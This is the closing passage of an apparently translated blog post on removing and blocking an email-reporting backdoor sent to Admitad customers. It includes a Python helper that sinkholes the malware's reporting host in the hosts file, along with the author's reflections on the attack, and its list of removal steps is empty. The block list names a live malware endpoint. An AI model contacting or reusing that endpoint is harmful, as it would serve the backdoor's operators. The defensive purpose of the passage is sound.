Part Five: Treatment


Removing this infection is not very difficult (unless, of course, the attacker has had time to remotely add another piece of malware to the computer). You need to complete the following steps:


How to protect against such an invasion? Against this particular modification of the backdoor you can protect yourself, for example, by adding the line “127.0.0.1 rmansys.ru” to the hosts file: then the backdoor will not be able to send the email to its master. If you manage a corporate firewall, you can add a rule blocking access to this host from the local network.
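An added example (my own code, not from the post) that checks a hosts file for the sinkhole line suggested above and adds it when missing. It refuses to append if the name is already mapped to a different address, because the hosts file is read top-down and an earlier line would win over the appended one. The sample hosts contents are constructed; the function names are mine.

```python
"""Check a hosts file for the 127.0.0.1 sinkhole entry and add it if absent."""

SINKHOLE_IP = "127.0.0.1"
BLOCKED_HOSTS = ("rmansys.ru",)   # host of the inet_id_notify.php endpoint


def hosts_entries(text):
    """Yield (ip, [hostnames]) per effective line, skipping blank lines and
    '#' comments, including trailing inline comments."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        yield ip, [n.lower() for n in names]


def missing_sinkholes(text, hosts=BLOCKED_HOSTS, ip=SINKHOLE_IP):
    """Names from `hosts` that no line maps to the sinkhole address."""
    pinned = {n for entry_ip, names in hosts_entries(text)
              for n in names if entry_ip == ip}
    return [h for h in hosts if h.lower() not in pinned]


def conflicting(text, hosts=BLOCKED_HOSTS, ip=SINKHOLE_IP):
    """Names from `hosts` that some line maps to an address other than `ip`."""
    wanted = {h.lower() for h in hosts}
    return sorted({n for entry_ip, names in hosts_entries(text)
                   for n in names if n in wanted and entry_ip != ip})


def add_sinkholes(text, hosts=BLOCKED_HOSTS, ip=SINKHOLE_IP):
    """Return `text` with one '<ip> <name>' line appended per missing name.
    Idempotent; raises ValueError if a name already points somewhere else,
    since an earlier hosts line takes precedence over an appended one."""
    bad = conflicting(text, hosts, ip)
    if bad:
        raise ValueError(f"already mapped to another address: {bad}")
    missing = missing_sinkholes(text, hosts, ip)
    if not missing:
        return text
    if text and not text.endswith("\n"):
        text += "\n"
    return text + "".join(f"{ip} {h}\n" for h in missing)


if __name__ == "__main__":
    # Constructed sample hosts file; a real run would read the system's file.
    sample = "127.0.0.1 localhost\n# corporate entries\n10.0.0.5 intranet.example  # wiki\n"
    print(add_sinkholes(sample), end="")
```

Read the system hosts file (on Windows, %SystemRoot%\System32\drivers\etc\hosts) into a string, pass it through add_sinkholes and write the result back with administrator rights; a ValueError from conflicting means someone has already redirected the name and the existing line needs looking at first.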

Part Six: The Final


Finally, I searched the Internet for others affected by this attack. It was not hard to find them: the attack was being discussed on the Admitad forum.

So the picture that emerged was roughly this: hackers infiltrated the Admitad network and pulled the client base out of it. Then they concocted this trojan and sent the letters to Admitad's customers through nodes of a botnet under their control. Some nodes of that same botnet that had a direct connection to the Internet were turned into NoIP servers, through which they could manage the newly infected computers.

What conclusions did I draw from this for myself?


The first conclusion: these days the Internet offers plenty of means to build such Trojans practically “on the knee”. Why bother writing your own backdoor when there are many ready-made, extremely advanced and feature-rich options? You just need to modify them a little and that's it.

The second conclusion: the anonymity of such an attack is exceptionally high. All I managed to get was the master's email address, which is, in general, worthless.

Third conclusion: I made a gross mistake. The first thing to do was to switch off the infected machine, not to dig around in it, and especially not over the Internet. The infected hard drive should have been attached to my own computer and only then examined. I was also lucky that it turned out to be a backdoor and not some kind of ransomware.

And with that, let me take my leave. Good health and good luck to all! Thanks for your attention!

Source: https://habr.com/ru/post/281284/